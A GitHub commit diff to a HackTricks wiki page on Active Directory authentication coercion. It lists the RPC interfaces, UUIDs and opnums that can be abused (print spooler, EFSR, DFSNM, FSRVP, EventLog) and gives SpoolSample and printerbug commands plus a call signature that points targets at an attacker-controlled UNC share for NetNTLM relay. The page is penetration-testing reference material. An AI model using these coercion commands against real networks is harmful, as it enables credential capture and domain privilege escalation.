Skip to content

Commit f73f3e0

Browse files
carlospolopcarlospolop
authored
Merge pull request #1568 from HackTricks-wiki/update_You_Thought_It_Was_Over__Authentication_Coercion_K_20251111_063229
You Thought It Was Over? Authentication Coercion Keeps Evolv...
2 parents 7aa035e + 234a108 commit f73f3e0

File tree

1 file changed

+53
-8
lines changed

1 file changed

+53
-8
lines changed

src/windows-hardening/active-directory-methodology/printers-spooler-service-abuse.md

Lines changed: 53 additions & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -36,7 +36,7 @@ rpcdump.py DOMAIN/USER:PASSWORD@SERVER.DOMAIN.COM | grep MS-RPRN
3636
3737
### Ask the service to authenticate against an arbitrary host
3838
39-
You can compile[ **SpoolSample from here**](https://github.com/NotMedic/NetNTLMtoSilverTicket)**.**
39+
You can compile [SpoolSample from here](https://github.com/NotMedic/NetNTLMtoSilverTicket).
4040
4141
```bash
4242
SpoolSample.exe <TARGET> <RESPONDERIP>
@@ -53,12 +53,48 @@ printerbug.py 'domain/username:password'@<Printer IP> <RESPONDERIP>
5353
5454
If an attacker has already compromised a computer with [Unconstrained Delegation](unconstrained-delegation.md), the attacker could **make the printer authenticate against this computer**. Due to the unconstrained delegation, the **TGT** of the **computer account of the printer** will be **saved in** the **memory** of the computer with unconstrained delegation. As the attacker has already compromised this host, he will be able to **retrieve this ticket** and abuse it ([Pass the Ticket](pass-the-ticket.md)).
5555
56-
## RCP Force authentication
57-
58-
59-
{{#ref}}
60-
https://github.com/p0dalirius/Coercer
61-
{{#endref}}
56+
## RPC Force authentication
57+
58+
[Coercer](https://github.com/p0dalirius/Coercer)
59+
60+
### RPC UNC-path coercion matrix (interfaces/opnums that trigger outbound auth)
61+
- MS-RPRN (Print System Remote Protocol)
62+
- Pipe: \\PIPE\\spoolss
63+
- IF UUID: 12345678-1234-abcd-ef00-0123456789ab
64+
- Opnums: 62 RpcRemoteFindFirstPrinterChangeNotification; 65 RpcRemoteFindFirstPrinterChangeNotificationEx
65+
- Tools: PrinterBug / PrintNightmare-family
66+
- MS-PAR (Print System Asynchronous Remote)
67+
- Pipe: \\PIPE\\spoolss
68+
- IF UUID: 76f03f96-cdfd-44fc-a22c-64950a001209
69+
- Opnum: 0 RpcAsyncOpenPrinter
70+
- MS-EFSR (Encrypting File System Remote Protocol)
71+
- Pipes: \\PIPE\\efsrpc (also via \\PIPE\\lsarpc, \\PIPE\\samr, \\PIPE\\lsass, \\PIPE\\netlogon)
72+
- IF UUIDs: c681d488-d850-11d0-8c52-00c04fd90f7e ; df1941c5-fe89-4e79-bf10-463657acf44d
73+
- Opnums commonly abused: 0, 4, 5, 6, 7, 12, 13, 15, 16
74+
- Tool: PetitPotam
75+
- MS-DFSNM (DFS Namespace Management)
76+
- Pipe: \\PIPE\\netdfs
77+
- IF UUID: 4fc742e0-4a10-11cf-8273-00aa004ae673
78+
- Opnums: 12 NetrDfsAddStdRoot; 13 NetrDfsRemoveStdRoot
79+
- Tool: DFSCoerce
80+
- MS-FSRVP (File Server Remote VSS)
81+
- Pipe: \\PIPE\\FssagentRpc
82+
- IF UUID: a8e0653c-2744-4389-a61d-7373df8b2292
83+
- Opnums: 8 IsPathSupported; 9 IsPathShadowCopied
84+
- Tool: ShadowCoerce
85+
- MS-EVEN (EventLog Remoting)
86+
- Pipe: \\PIPE\\even
87+
- IF UUID: 82273fdc-e32a-18c3-3f78-827929dc23ea
88+
- Opnum: 9 ElfrOpenBELW
89+
- Tool: CheeseOunce
90+
91+
Note: These methods accept parameters that can carry a UNC path (e.g., `\\attacker\share`). When processed, Windows will authenticate (machine/user context) to that UNC, enabling NetNTLM capture or relay.
92+
93+
### MS-EVEN: ElfrOpenBELW (opnum 9) coercion
94+
- Interface: MS-EVEN over \\PIPE\\even (IF UUID 82273fdc-e32a-18c3-3f78-827929dc23ea)
95+
- Call signature: ElfrOpenBELW(UNCServerName, BackupFileName="\\\\attacker\\share\\backup.evt", MajorVersion=1, MinorVersion=1, LogHandle)
96+
- Effect: the target attempts to open the supplied backup log path and authenticates to the attacker-controlled UNC.
97+
- Practical use: coerce Tier 0 assets (DC/RODC/Citrix/etc.) to emit NetNTLM, then relay to AD CS endpoints (ESC8/ESC11 scenarios) or other privileged services.
6298
6399
## PrivExchange
64100
@@ -137,4 +173,13 @@ If you can perform a MitM attack to a computer and inject HTML in a page he will
137173
If you can capture [NTLMv1 challenges read here how to crack them](../ntlm/index.html#ntlmv1-attack).\
138174
_Remember that in order to crack NTLMv1 you need to set Responder challenge to "1122334455667788"_
139175
140-
{{#include ../../banners/hacktricks-training.md}}
176+
## References
177+
- [Unit 42 – Authentication Coercion Keeps Evolving](https://unit42.paloaltonetworks.com/authentication-coercion/)
178+
- [Microsoft – MS-EVEN: EventLog Remoting Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-even/55b13664-f739-4e4e-bd8d-04eeda59d09f)
179+
- [Microsoft – MS-EVEN: ElfrOpenBELW (Opnum 9)](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-even/4db1601c-7bc2-4d5c-8375-c58a6f8fc7e1)
180+
- [p0dalirius – windows-coerced-authentication-methods](https://github.com/p0dalirius/windows-coerced-authentication-methods)
181+
- [PetitPotam (MS-EFSR)](https://github.com/topotam/PetitPotam)
182+
- [DFSCoerce (MS-DFSNM)](https://github.com/Wh04m1001/DFSCoerce)
183+
- [ShadowCoerce (MS-FSRVP)](https://github.com/ShutdownRepo/ShadowCoerce)
184+
185+
{{#include ../../banners/hacktricks-training.md}}

0 commit comments

Comments
 (0)